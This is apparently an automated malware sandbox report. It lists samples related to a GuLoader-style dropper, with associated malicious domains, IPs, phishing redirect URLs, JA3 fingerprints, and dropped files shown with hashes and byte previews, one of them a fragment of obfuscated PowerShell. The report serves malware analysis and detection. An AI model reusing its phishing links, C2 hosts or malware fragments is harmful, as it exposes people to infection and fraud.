                                              POTWIERDZENIE_TRANSAKCJI_20240418145856.exeGet hashmaliciousGuLoaderBrowse
                                                Invptapayment19032024.exeGet hashmaliciousAgentTeslaBrowse
                                                  217.160.0.1831704202412475.EXE.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                  • www.jt-berger.store/9pdo/
                                                  16042024124528724.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                  • www.jt-berger.store/9pdo/
                                                  S#U0130PAR#U0130S_0433.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                  • www.jt-berger.store/9pdo/
                                                  16042024124528724.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                  • www.jt-berger.store/9pdo/
                                                  160420241245287.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                  • www.jt-berger.store/9pdo/
                                                  16042024124521.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                  • www.jt-berger.store/9pdo/
                                                  2024164846750.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                  • www.jt-berger.store/9pdo/
                                                  S#U0130PAR#U0130S_0453.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                  • www.jt-berger.store/9pdo/
                                                  2024041342836038.EXE.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                  • www.jt-berger.store/9pdo/
                                                  202404153836038.EXE.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                  • www.jt-berger.store/9pdo/

                                                  Domains

                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                  kraljevikonaci.rsPOTWIERDZENIE_TRANSAKCJI_20240418145856.exeGet hashmaliciousGuLoaderBrowse
                                                  • 195.252.110.253
                                                  www.jt-berger.store1704202412475.EXE.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                  • 217.160.0.183
                                                  16042024124528724.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                  • 217.160.0.183
                                                  S#U0130PAR#U0130S_0433.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                  • 217.160.0.183
                                                  16042024124528724.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                  • 217.160.0.183
                                                  160420241245287.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                  • 217.160.0.183
                                                  16042024124521.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                  • 217.160.0.183
                                                  2024164846750.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                  • 217.160.0.183
                                                  S#U0130PAR#U0130S_0453.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                  • 217.160.0.183
                                                  2024041342836038.EXE.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                  • 217.160.0.183
                                                  202404153836038.EXE.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                  • 217.160.0.183

                                                  ASNs

                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                  KIXS-AS-KRKoreaTelecomKRWwKYOW4jIg.elfGet hashmaliciousMiraiBrowse
                                                  • 222.112.186.45
                                                  tw7rloKDkG.elfGet hashmaliciousMiraiBrowse
                                                  • 175.219.70.176
                                                  ZcOjro0Chh.elfGet hashmaliciousMiraiBrowse
                                                  • 14.32.5.202
                                                  uqGHhft2DO.elfGet hashmaliciousMiraiBrowse
                                                  • 183.127.235.108
                                                  5RiFmXTOMp.elfGet hashmaliciousMiraiBrowse
                                                  • 175.216.85.211
                                                  Hs97Nxxy5u.elfGet hashmaliciousMiraiBrowse
                                                  • 175.250.196.247
                                                  sBgS8t0K7i.elfGet hashmaliciousMiraiBrowse
                                                  • 211.34.203.16
                                                  n0CEgmtnuf.elfGet hashmaliciousMiraiBrowse
                                                  • 221.160.166.181
                                                  bUuAPqXmkL.elfGet hashmaliciousMiraiBrowse
                                                  • 59.26.88.68
                                                  oVOImRIAaz.elfGet hashmaliciousMiraiBrowse
                                                  • 211.113.104.170
                                                  ONEANDONE-ASBrauerstrasse48DEHs97Nxxy5u.elfGet hashmaliciousMiraiBrowse
                                                  • 82.165.9.224
                                                  WzfUKCEskB.elfGet hashmaliciousChaosBrowse
                                                  • 77.68.37.125
                                                  PO0424024.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                  • 213.171.195.105
                                                  shipping document.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                  • 217.160.0.111
                                                  Zapytanie ofertowe (7427-23 ROCKFIN).exeGet hashmaliciousAgentTesla, DarkTortillaBrowse
                                                  • 213.165.67.118
                                                  INQ No.KP-50-000-PS-IN-INQ-0027.exeGet hashmaliciousFormBookBrowse
                                                  • 217.76.128.34
                                                  https://lamerelea.com/Get hashmaliciousUnknownBrowse
                                                  • 217.160.0.59
                                                  Gq7FlDf6cE.elfGet hashmaliciousMiraiBrowse
                                                  • 217.174.247.147
                                                  Signed Proforma Invoice 3645479_pdf.vbsGet hashmaliciousFormBookBrowse
                                                  • 217.160.0.95
                                                  https://recouvrement-assurance.fr/LKeZLGet hashmaliciousUnknownBrowse
                                                  • 82.165.105.163
                                                  SAKURA-CSAKURAInternetIncJPhttps://www.ne16.com/t/4177044/70602841/2927387/1/124665/?f8785874=aHR0cHM6Ly93b29kLWRlY2sub3JnL3BkZi85SWRac1p5aTJEeWh3ZUcvYTFmM2IxODIyN2RiNTc4NjIzOGE2ZTc0NTE3YWQ4MDEvWEM4YXAvYTFmM2IxODIyN2RiNTc4NjIzOGE2ZTc0NTE3YWQ4MDEvWTJOc1lYSmxRR0psYkd4d1lYSjBibVZ5YzJsdVl5NWpiMjA9Get hashmaliciousHTMLPhisherBrowse
                                                  • 183.90.245.33
                                                  YKLjlQEZKY.elfGet hashmaliciousMiraiBrowse
                                                  • 182.49.45.94
                                                  jdsfl.arm.elfGet hashmaliciousMiraiBrowse
                                                  • 182.49.45.90
                                                  QXeoSsX87R.elfGet hashmaliciousGafgyt, MiraiBrowse
                                                  • 157.112.148.28
                                                  http://t.cm.morganstanley.com/r/?id=h1b92d14%2C134cc33c%2C1356be32&p1=www.saiengroup.com%2Fteaz%2F648c482b60b3906833c9304bab170add%2FJBVNhz%2FYW15LmNoZW5AZG91YmxlbGluZS5jb20=Get hashmaliciousHTMLPhisherBrowse
                                                  • 120.136.14.8
                                                  1704202412475.EXE.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                  • 219.94.128.41
                                                  S#U0130PAR#U0130S_0433.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                  • 219.94.128.41
                                                  16042024124528724.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                  • 219.94.128.41
                                                  160420241245287.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                  • 219.94.128.41
                                                  https://ruv80zbas1.execute-api.us-east-1.amazonaws.com/prod/jump?redirect_url=http://bs-nakagawa.com/PMxdv77xgwVSyGqqOWzi/62df5bbd4291fb27f637dee413562c6e/bWljaGFlbC5jaHVAbGNhdHRlcnRvbi5jb20=&creative_id=601&tag_name=Rob_A_Facebook&operative_id=33090Get hashmaliciousHTMLPhisherBrowse
                                                  • 183.90.246.80
                                                  BEOTEL-AShttpwwwbeotelnetRS179XakWwrt2H1Xx.exeGet hashmaliciousAgentTeslaBrowse
                                                  • 195.252.110.253
                                                  REMITTANCE ADVICE IF01200022823418 Match 2024.exeGet hashmaliciousAgentTeslaBrowse
                                                  • 195.252.110.253
                                                  POTWIERDZENIE_TRANSAKCJI_20240418145856.exeGet hashmaliciousGuLoaderBrowse
                                                  • 195.252.110.253
                                                  BNuwexy0tz.elfGet hashmaliciousMiraiBrowse
                                                  • 62.193.212.122
                                                  ydlkilluNn.elfGet hashmaliciousGafgyt, MiraiBrowse
                                                  • 62.108.98.143
                                                  AMjH2Tev6H.elfGet hashmaliciousMirai, GafgytBrowse
                                                  • 62.108.98.156
                                                  LmRWdFDFaQ.elfGet hashmaliciousMirai, GafgytBrowse
                                                  • 62.108.98.132
                                                  mUP7fvcqLi.elfGet hashmaliciousMiraiBrowse
                                                  • 62.108.98.133
                                                  bgj2URl5B2.elfGet hashmaliciousMirai, OkiruBrowse
                                                  • 195.252.91.201
                                                  Invptapayment19032024.exeGet hashmaliciousAgentTeslaBrowse
                                                  • 195.252.110.253

                                                  JA3 Fingerprints

                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                  37f463bf4616ecd445d4a1937da06e19ProconGO1121082800.LnK.lnkGet hashmaliciousUnknownBrowse
                                                  • 195.252.110.253
                                                  file.exeGet hashmaliciousClipboard Hijacker, RisePro StealerBrowse
                                                  • 195.252.110.253
                                                  Version.125.7599.75.jsGet hashmaliciousSocGholishBrowse
                                                  • 195.252.110.253
                                                  Database4.exeGet hashmaliciousUnknownBrowse
                                                  • 195.252.110.253
                                                  lzShU2RYJa.exeGet hashmaliciousBabuk, Clipboard Hijacker, Djvu, VidarBrowse
                                                  • 195.252.110.253
                                                  XV9q6mY4DI.exeGet hashmaliciousBabuk, DjvuBrowse
                                                  • 195.252.110.253
                                                  n8XBpFdVFU.exeGet hashmaliciousBabuk, Djvu, VidarBrowse
                                                  • 195.252.110.253
                                                  R5391762lf.exeGet hashmaliciousClipboard Hijacker, Djvu, VidarBrowse
                                                  • 195.252.110.253
                                                  Swift Payment.batGet hashmaliciousAgentTesla, GuLoaderBrowse
                                                  • 195.252.110.253
                                                  file.exeGet hashmaliciousVidarBrowse
                                                  • 195.252.110.253

                                                  Dropped Files

                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                  C:\Users\user\AppData\Local\Temp\nscAD7.tmp\nsExec.dllhttps://www.inputdirector.com/downloads.htmlGet hashmaliciousUnknownBrowse
                                                    Arkopa Ahsap Panel San. A.S.#3152.exeGet hashmaliciousGuLoader, RemcosBrowse
                                                      Arkopa Ahsap Panel San. A.S.#3152.exeGet hashmaliciousGuLoaderBrowse
                                                        Arkopa Ahsap Panel San. A.S.#3152.exeGet hashmaliciousGuLoader, RemcosBrowse
                                                          Arkopa Ahsap Panel San. A.S.#3152.exeGet hashmaliciousGuLoaderBrowse
                                                            GR&_T._Ekstralam_Proorma_1&_7687429--&.exeGet hashmaliciousGuLoader, RemcosBrowse
                                                              GR&_T._Ekstralam_Proorma_1&_7687429--&.exeGet hashmaliciousGuLoaderBrowse
                                                                maalesteder.exeGet hashmaliciousRemcos, GuLoaderBrowse
                                                                  maalesteder.exeGet hashmaliciousGuLoaderBrowse
                                                                    RFQ_Quote.PDF.exeGet hashmaliciousUnknownBrowse

                                                                      Created / dropped Files

                                                                      C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

                                                                      Download File
                                                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                      File Type:data
                                                                      Category:modified
                                                                      Size (bytes):8003
                                                                      Entropy (8bit):4.838950934453595
                                                                      Encrypted:false
                                                                      SSDEEP:192:Dxoe5nVsm5emdiVFn3eGOVpN6K3bkkjo5agkjDt4iWN3yBGHB9smMdcU6CDpOeik:N+VoGIpN6KQkj2xkjh4iUxeLib4J
                                                                      MD5:4C24412D4F060F4632C0BD68CC9ECB54
                                                                      SHA1:3856F6E5CCFF8080EC0DBAC6C25DD8A5E18205DF
                                                                      SHA-256:411F07FE2630E87835E434D00DC55E581BA38ECA0C2025913FB80066B2FFF2CE
                                                                      SHA-512:6538B1A33BF4234E20D156A87C1D5A4D281EFD9A5670A97D61E3A4D0697D5FFE37493B490C2E68F0D9A1FD0A615D0B2729D170008B3C15FA1DD6CAADDE985A1C
                                                                      Malicious:false
                                                                      Reputation:moderate, very likely benign file
                                                                      Preview:PSMODULECACHE.....$7o..z..Y...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script........$7o..z..T...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PSModule.psm1*.......Install-Script........Save-Module........Publish-Module........Find-Module........Download-Package........Update-Module....

                                                                      C:\Users\user\AppData\Local\Temp\545Ni1I

                                                                      Download File
                                                                      Process:C:\Windows\SysWOW64\cmd.exe
                                                                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 7, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 7
                                                                      Category:dropped
                                                                      Size (bytes):196608
                                                                      Entropy (8bit):1.1211596417522893
                                                                      Encrypted:false
                                                                      SSDEEP:192:r2qAdB9TbTbuDDsnxCkvSAE+WslKOMq+8wH0hL3kWieF:r2qOB1nxCkvSAELyKOMq+8wH0hLUZs
                                                                      MD5:0AB67F0950F46216D5590A6A41A267C7
                                                                      SHA1:3E0DD57E2D4141A54B1C42DD8803C2C4FD26CB69
                                                                      SHA-256:4AE2FD6D1BEDB54610134C1E58D875AF3589EDA511F439CDCCF230096C1BEB00
                                                                      SHA-512:D19D99A54E7C7C85782D166A3010ABB620B32C7CD6C43B783B2F236492621FDD29B93A52C23B1F4EFC9BF998E1EF1DFEE953E78B28DF1B06C24BADAD750E6DF7
                                                                      Malicious:false
                                                                      Preview:SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                      C:\Users\user\AppData\Local\Temp\Moviedom230\Enforcedly251\Afvrgningernes.Ign37

                                                                      Download File
                                                                      Process:C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.9746.16728.exe
                                                                      File Type:ASCII text, with very long lines (65536), with no line terminators
                                                                      Category:dropped
                                                                      Size (bytes):75468
                                                                      Entropy (8bit):5.213840255922679
                                                                      Encrypted:false
                                                                      SSDEEP:1536:t9Sm33eWjr3xQ0/weIUAFyajOq3Nn6Ot/s/z5poetn8kcFH30aS7deqQx+:tTXKY1OZt/s/zw+8kckaSReqQg
                                                                      MD5:2A4D239948B7BA6C05B6DC3D6A4BD41D
                                                                      SHA1:CE9C6D7CABFA263B0AF02023BEAA4938D2DBA4F5
                                                                      SHA-256:490FAFE9835E76B1780427BDFC6F32529D04C81630A5678C6AF77B3D46A0276A
                                                                      SHA-512:D7205FD1293ABA4310773546C50DA78D0F9C0FF37DFC0EFBCC9928666A556DCA634C0EC9DBC01F70BF5CB071C547BEE36A1BE40FF705A55D41885FBBD1457A57
                                                                      Malicious:true
                                                                      Preview:$Plasmapheresis=$Kirkegaardslederes;<#Pantophobous inspektioner revaccinations #><#Peragration Antineutrinos Didactic Gainfulness Bevbning Kvidres #><#Labiovelar Brisbane Cubaneres Bazooms Darwinist Prefearfully #><#Aandsliv Sulfoxylate Proclivity Aspersory #><#Aleksandrineren Klaverstemmere Wharf Opfedede Vandbassin Fezziwig #><#Teknikkerne Hamiltonism Ultimo approksimativ Senneps Strejkevarslers Bossily #><#Kommandodele Terrorgruppens Fremontia Dunstedes #><#Klede Knudredes Kartoffelprodukter Urineret Bookrests Frottage Lotuko #><#Jongleringens Menyie Polypean #><#Udvandringers Cadeauerne Osgiliath Imperfectivity Uddannelsesaktiviteterne Delnoeglen Provoens #><#Udpibendes Troldkarlene Protegeerne #><#Sigjnersken Earthshaking Julende sieva #><#Sukkerkugler Hinnying Doless #><#Knivsbjergs Semimade Jalousiskabs #><#Rveskindspelse Kibitzing Feltmssig Microsoma Unlaborables #><#Ugemagasinerne Befaestet Aktuelles Hjertespand Sallowed #><#Letlbende Funktionsforskrift Krampetrkningernes Smre

                                                                      C:\Users\user\AppData\Local\Temp\Moviedom230\Enforcedly251\Aphthong.cal

                                                                      Download File
                                                                      Process:C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.9746.16728.exe
                                                                      File Type:data
                                                                      Category:dropped
                                                                      Size (bytes):318271
                                                                      Entropy (8bit):7.692725386800131
                                                                      Encrypted:false
                                                                      SSDEEP:6144:4KOElsUFum7Cl2KOnFQfSIYTgcpHZHN2wB7FHe//pXFM8O:NOElhFumRbnFQYTZZUwVFH6XFA
                                                                      MD5:B5464E0D8950A57546E96BB94F6C2CF1
                                                                      SHA1:B31D124005D806419ADFB7F2F055F959C406B97A
                                                                      SHA-256:795E6773D208F28D17AE68B6A0D793A568B306764666702BB9591FAF0FB85EC2
                                                                      SHA-512:F10BC9334F3B4AFA3D58AD7F87D0C6874DCACB3B2EABC1F5AE047AE786FE4C7C0E79EE7FD44640202AB0CB0E244E67BC038A3F2173A729FEED3090F8E6D9F3EC
                                                                      Malicious:false
                                                                      Preview:................)))...............................{............!.....................o.zzzz.......[[[.......................l.............;...~~~~~~......d........ ......................................p...D..................o.....{{...........7...............`.....2...OO.W......d........f..^^^.W....}}}}}}......(.""..V.<<.}}}........t..........!.................................R.H.....Q........................................................o.....z....mmm....%.....................Z......PPP............1.....jj.Q...bb.....F.f.n...................BBBB...................@@@......E./.........................$.........::...................pp........ss.......vvv.................LL......r..f..ppppppp...333.???......................o..ZZZ..........<.....iiii.....................................................................$.N........K...3......S....q..0....TT.**...........................k................y.........x......UUU......................--......>>>>................:.????..........

                                                                      C:\Users\user\AppData\Local\Temp\Moviedom230\Enforcedly251\Microtine76.txt

                                                                      Download File
                                                                      Process:C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.9746.16728.exe
                                                                      File Type:ASCII text, with CRLF line terminators
                                                                      Category:dropped
                                                                      Size (bytes):331
                                                                      Entropy (8bit):4.273871704234191
                                                                      Encrypted:false
                                                                      SSDEEP:6:FhQqEX1PFai+7DFv7VFqYA0LD26kWVNALRVzKMvCRMnbIOBK8AVQAXJ:Ax1PFaiyDFvmYAR6tALRVdCRMzyVQAXJ
                                                                      MD5:7CB24DDED50A9F89BB5D62F961802F20
                                                                      SHA1:2F21F643FA1501A90B01CE1702E53C32C0EF56FC
                                                                      SHA-256:D70B7E5A8FDC7AC864455470D282565FE41A3F0937D8F89A85D30BBB93B59F12
                                                                      SHA-512:EF7758A566578EEABE3AD92047F01FBD4D38549D505D943AB1A2AE73BB5A077F53E9A36AB1D0BDD795F560D89AC86EB3AA3BA881AFF1D942BB308BA5217F1675
                                                                      Malicious:false
                                                                      Preview:calamites attabal abefester strikkebgers panaceas transporttidens bynet sjakformndenes..impenetrability draconism keratoma unwan erugos agterstavne.alcazar knickknacks rustsvamp.fellow glden fredningsstyrelserne.mesomorphous x lageroptllinger grano diatomlhernes truckfrernes retteskema,riskiest depart underdanighedens spioneriet,

                                                                      C:\Users\user\AppData\Local\Temp\Moviedom230\Grnnende\indhuggene.sex

                                                                      Download File
                                                                      Process:C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.9746.16728.exe
                                                                      File Type:data
                                                                      Category:dropped
                                                                      Size (bytes):1357
                                                                      Entropy (8bit):4.74845460874173
                                                                      Encrypted:false
                                                                      SSDEEP:24:Z5QlYl0R38zWCYHiwBBSli2q4IW+ZX84qNMKOJNWPL5lMflvnl:14SKBBSA2Ha24qNg4PvMNvl
                                                                      MD5:F4CE6C53FFB5533A5DAB605E98EB4067
                                                                      SHA1:2D1A46B2CF7C902BDC6B5D6FDA59E5EA899949EE
                                                                      SHA-256:B71330891ECC7E46AE3BFF434DCC8659B106415D0EFC2C4D6E61811AC9F58D2F
                                                                      SHA-512:C47BA80C126DA2A527CD090322786C3F0B58FB6C6F285275E60D0B95FAE8804559C242CE8F35CF7A23753624F994B0DDCAF2DC19203B7237DA3B0C45CF6934A9
                                                                      Malicious:false
                                                                      Preview:...D....A.k..+w..A.........C...Ac..........3........z.>es"......p8x......................Kx.]3....7F..y....h..l..%...y...W....i.P..z...4...\...........-x..................9..........Q...ccI0.........................................f....[.......................m..Y.J...&...&.........Rz..a............m..b..v..V'H...N....7...Z...i[......q.E.7'........>...'....C.K..1A.!.............../s.z.. ....b......W............#...........hM.v.....^....%...........)..r..........@.w..&....L.......g.....g......j..............2.5........].....g.$............#".......o....A........$.q&......i.........fE......x.z...x...N...'6..~.\..f.g...i..............".P....X.............)....-.............f..D.(6X....}.............TL.Jb...U.Q..p..+............~z.....................P.4.....(...P..8...................[d.......U......Z.r2.b......?..8.$...C.`...G.G..........m.......................&..+.....Te...e..[.........VO@.M.|.......|............X...O....8.{..$z..............h..............j/E.....z.v*...

                                                                      C:\Users\user\AppData\Local\Temp\Moviedom230\Grnnende\syringitis.sei

                                                                      Download File
                                                                      Process:C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.9746.16728.exe
                                                                      File Type:data
                                                                      Category:dropped
                                                                      Size (bytes):2223
                                                                      Entropy (8bit):4.7966671661641005
                                                                      Encrypted:false
                                                                      SSDEEP:48:iEnd10UW5SlYmi0arFyRRqQeQpfS/8HHtgGVOe7:hdk1miHrrMGMNjN7
                                                                      MD5:65AFA39B0E2935FD0F0EAAE9934A09EC
                                                                      SHA1:6D7C896C9825809046862695877EB88C3248C6F8
                                                                      SHA-256:75B6002232106FA6BA35B5554270461E0431D11EEA7D67ADBAD2651D19790A20
                                                                      SHA-512:732A14FCAB8E7845B239930FDC3CC1BEF2B08AB06B740D6931CDC2F352C7505BD5E26F6DB820771089664BDD2AE9347B20E1BB769ABB5C60A472B1240D35DF6A
                                                                      Malicious:false
                                                                      Preview:............E.N....k.1....P..8.,.-.........:....]h........\.S.D6.....p..o...............".......4.a..R.h....3....a.O....T...S:..cK....-|..........u..............f...T..........T...o...A..G.T..p....u~.......s.5I.......F.S....*...........`.......qD....m.....:...(.....Q..Z..........g.......eN.D..............C.........Xh*........U.w..j.........#..........[........<Q...o8...........X...p@........jw.I........y..J..0......."q.b..y..c..l............K................W........._..*...4.,..x.......^...v...........J...........}.N...7.y...o^..........V...Y..S...................................2....4........D.c..C......&rU.....@..}........................^.................w....!......;......O......0.k_......_..".....m.........;...........I.......c....r....................#.......[.j.....q|...8..BB......V.....4..\>....."...X.u....*.P....................7.....=......A.....0...........@.....[..........8......l+.........F....k.L...+..........[..E.......3............'.4.......B...u..........?..e.M...

                                                                      C:\Users\user\AppData\Local\Temp\Overfondle.exe

                                                                      Download File
                                                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                                                                      Category:dropped
                                                                      Size (bytes):562306
                                                                      Entropy (8bit):7.466005196525454
                                                                      Encrypted:false
                                                                      SSDEEP:12288:8stfWr2zXogHMSwOdJ1JUTrNuVwik2Mx/DvMAM++:8st+r2zXZ/dJyrNuuik2yDc++
                                                                      MD5:4621FEA50E1982E6F753EFE7D1BE2B35
                                                                      SHA1:46072B07BFA96583ED03149A04411CBCF04EADF9
                                                                      SHA-256:6B2874507FC8B7782D11F202840850BA6EDD8BEFBB8C163C4D53775FB8D20603
                                                                      SHA-512:301E380D9E207CAA7E994B251E2018207851A32F0C1850B3DE669742C9D640D5254640D972E0143BC99E8CB2E3728BB7878814E66498928FF777D26C9BD206F5
                                                                      Malicious:true
                                                                      Antivirus:
                                                                      • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                      • Antivirus: ReversingLabs, Detection: 50%
                                                                      • Antivirus: Virustotal, Detection: 61%, Browse
                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1)..PG..PG..PG.*_...PG..PF.IPG.*_...PG.sw..PG..VA..PG.Rich.PG.........PE..L...<.Oa.................f...|.......3............@.......................................@.................................D........................................................................................................................text....e.......f.................. ..`.rdata...............j..............@..@.data...8U...........~..............@....ndata...................................rsrc...............................@..@................................................................................................................................................................................................................................................................................................................................................................

                                                                      C:\Users\user\AppData\Local\Temp\Overfondle.exe:Zone.Identifier

                                                                      Download File
                                                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                      File Type:ASCII text, with CRLF line terminators
                                                                      Category:dropped
                                                                      Size (bytes):26
                                                                      Entropy (8bit):3.95006375643621
                                                                      Encrypted:false
                                                                      SSDEEP:3:ggPYV:rPYV
                                                                      MD5:187F488E27DB4AF347237FE461A079AD
                                                                      SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                      SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                      SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                      Malicious:false
                                                                      Preview:[ZoneTransfer]....ZoneId=0

                                                                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_acx2dohq.jjt.ps1

                                                                      Download File
                                                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                      File Type:ASCII text, with no line terminators
                                                                      Category:dropped
                                                                      Size (bytes):60
                                                                      Entropy (8bit):4.038920595031593
                                                                      Encrypted:false
                                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                      Malicious:false
                                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_nabxb5xc.ktc.psm1

                                                                      Download File
                                                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                      File Type:ASCII text, with no line terminators
                                                                      Category:dropped
                                                                      Size (bytes):60
                                                                      Entropy (8bit):4.038920595031593
                                                                      Encrypted:false
                                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                      Malicious:false
                                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                      C:\Users\user\AppData\Local\Temp\nscAD7.tmp\nsExec.dll

                                                                      Download File
                                                                      Process:C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.9746.16728.exe
                                                                      File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                      Category:dropped
                                                                      Size (bytes):6656
                                                                      Entropy (8bit):5.1793678932213725
                                                                      Encrypted:false
                                                                      SSDEEP:96:AOBtEB2flLkatAthPZJoi9jpfW/er6cBbcB/NFyVOHd0+uHwEX:AhB2flXAVJtjf6cBbcB/N8Ved0PZ
                                                                      MD5:5AA38904ACDCC21A2FB8A1D30A72D92F
                                                                      SHA1:A9CE7D1456698921791DB91347DBA0489918D70C
                                                                      SHA-256:10675F13ABAEE592F14382349AA35D82FB52AAB4E27EEF61D0C83DEC1F6B73DA
                                                                      SHA-512:F04740DA561D7CD0DEA5E839C9E1C339D4A3E63944D3566C94C921A3D170A69918A32DFF3F3B43F13D55CC25A2DBB4C21104F062C324308AC5104179766402A3
                                                                      Malicious:true
                                                                      Antivirus:
                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                      • Antivirus: Virustotal, Detection: 0%, Browse
                                                                      Joe Sandbox View:
                                                                      • Filename: , Detection: malicious, Browse
                                                                      • Filename: Arkopa Ahsap Panel San. A.S.#3152.exe, Detection: malicious, Browse
                                                                      • Filename: Arkopa Ahsap Panel San. A.S.#3152.exe, Detection: malicious, Browse
                                                                      • Filename: Arkopa Ahsap Panel San. A.S.#3152.exe, Detection: malicious, Browse
                                                                      • Filename: Arkopa Ahsap Panel San. A.S.#3152.exe, Detection: malicious, Browse
                                                                      • Filename: GR&_T._Ekstralam_Proorma_1&_7687429--&.exe, Detection: malicious, Browse
                                                                      • Filename: GR&_T._Ekstralam_Proorma_1&_7687429--&.exe, Detection: malicious, Browse
                                                                      • Filename: maalesteder.exe, Detection: malicious, Browse
                                                                      • Filename: maalesteder.exe, Detection: malicious, Browse
                                                                      • Filename: RFQ_Quote.PDF.exe, Detection: malicious, Browse
                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........................,.................Rich...........PE..L.....Oa...........!......................... ...............................P............@..........................$..l.... ..P............................@....................................................... ...............................text............................... ..`.rdata....... ......................@..@.data........0......................@....reloc.......@......................@..B................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                      C:\Windows\SysWOW64\psiloses.lnk

                                                                      Download File
                                                                      Process:C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.9746.16728.exe
                                                                      File Type:MS Windows shortcut, Item id list present, Has Relative path, Has Working directory, ctime=Sun Dec 31 23:06:32 1600, mtime=Sun Dec 31 23:06:32 1600, atime=Sun Dec 31 23:06:32 1600, length=0, window=hide
                                                                      Category:dropped
                                                                      Size (bytes):886
                                                                      Entropy (8bit):3.285899309149801
                                                                      Encrypted:false
